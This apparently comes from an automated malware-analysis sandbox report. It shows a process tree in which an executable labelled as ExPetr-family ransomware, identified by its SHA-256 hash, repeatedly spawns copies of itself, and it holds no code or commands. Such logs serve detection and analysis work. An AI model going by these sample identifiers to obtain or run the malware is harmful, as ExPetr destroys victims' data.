C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5540
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5532
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5584
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:2868
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4732
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5684
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5708
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5788
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4528
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5864
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3656
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5736
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4780
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3428
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5912
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5668
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5212
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5812
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6260
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4452
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5232
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5832
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5436
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5448
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5488
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6312
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6320
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6340
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6384
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6428
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6444
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6872
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6416
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6584
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6596
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6604
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6612
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6624
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6640
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6648
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6652
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6736
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6744
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6516
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6456
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6460
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6468
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6480
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6496
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5328
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5968
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5544
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6540
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:316
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6856
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6840
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6832
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6824
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6816
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6808
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6804
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6572
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6564
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6556
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5308
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3480
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3548
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6220
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5920
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6536
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6140
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3580
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5908
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5568
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6676
-
-
